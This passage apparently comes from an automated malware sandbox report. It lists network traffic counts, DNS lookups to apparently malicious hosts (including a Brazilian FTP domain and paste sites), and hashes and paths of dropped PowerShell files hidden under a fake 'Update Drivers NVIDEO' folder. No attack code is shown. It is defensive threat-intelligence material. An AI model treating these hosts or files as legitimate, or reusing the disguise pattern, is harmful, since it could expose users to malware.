260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
67 B 97 B 1 1
DNS Request
ftp.desckvbrat.com.br
DNS Response
191.252.83.213
-
72 B 158 B 1 1
DNS Request
64.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 138 B 1 1
DNS Request
213.83.252.191.in-addr.arpa
-
54 B 86 B 1 1
DNS Request
paste.ee
DNS Response
104.21.84.67172.67.187.200
-
71 B 133 B 1 1
DNS Request
67.84.21.104.in-addr.arpa
-
70 B 100 B 1 1
DNS Request
www.gratitudeseekers.com
DNS Response
173.231.247.100
-
74 B 116 B 1 1
DNS Request
100.247.231.173.in-addr.arpa
-
58 B 106 B 1 1
DNS Request
pastebin.com
DNS Response
172.67.19.24104.20.4.235104.20.3.235
-
71 B 133 B 1 1
DNS Request
24.19.67.172.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
149.220.183.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
53.210.109.20.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
206.23.85.13.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5f0a4e8fe1e6f68abb30bd96063bbdd65
SHA1a944151ffbc65f3e50a049a62a039cd3110b55a7
SHA25604043fa96469f00cd35a6bbd2cebb7f94590978e349bf0be991feefa5e137a48
SHA512b631372bac47462b0514d26f86b8e676275333e1d11dc7d6908ca27204f3f06ac32260cce3541bc034e105d0f7b58de28cb63dd3f89308936901ce7574ba0413
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD56c14b13b09ca3250b8c108b05aa1afb0
SHA118e50e6f1f445add8dbfd7441dba50b4d36f42f0
SHA256a147f4fb3ba4dee9197d7192ce22385e2c5da6987ab044bd2d2d2b7adac71c4a
SHA512feca9dd078055a76d09290c2e6ff9dae608bdff807fe7e742ea4961a4877f2b5eb3d9d171941dfd0f19cebd1cebed7d35b3d6cbbecfe7ddfda5daf2bb4f85f69
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
1KB
MD5eb3000415eb99f501f17adc8986d82e9
SHA1debcebcf3d78bcedf49512ba079fcd59e2b9a274
SHA2564a381064a874120659c2c68508f8cc8732518b60c92e4bbd158642bf8e295dd0
SHA5120addbd990fe39e016285ebd18233a302cb3c09229eb064cc141cfe57e291b458ea09629d18c2c24d562bcafe1393069601ee2850f2b3960794260a09a4b5a8bb
-
Filesize
948B
MD5721991167161c45d61b03e4dbad4984b
SHA1fd3fa85d142b5e8d4906d3e5bfe10c5347958457
SHA2560a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb
SHA512f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\rnmzv.ps1
Filesize1.7MB
MD5e7c82fa422bc247b3af1f0c6a98a76a6
SHA148e038fe5710a3c71d70eaf756a15c1a9f0ed576
SHA2565503e9420481271cbc5ba26f1b106cd2bb6e985cce64183ec17a06eb0c6dbc59
SHA5125095bbe62cd54c4875393bd2398ff74b93048d81d94678f0407aa98eda99b63219db42685beb4791b6b735684f98b27f2dd507362352ef09cbe701440484aac1
-
C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1
Filesize392B
MD55a22df6b3134a8f60a0463b4fa3aaa30
SHA128caa9181e48a30a08458afc1b5d5b70741d4e9f
SHA2565be7abf20950ffc57ac23cb16430d59e9b0162629cc86a71025f707135485539
SHA512ed356adb870af28ae1e3bc6e7b1af6ef3cd4de697d3a3a1383b957bd27dbb62396bf9ed4165d4e07a68f54ee4ef46030504b8e48c7e31c7d55cc84cec87a3fe1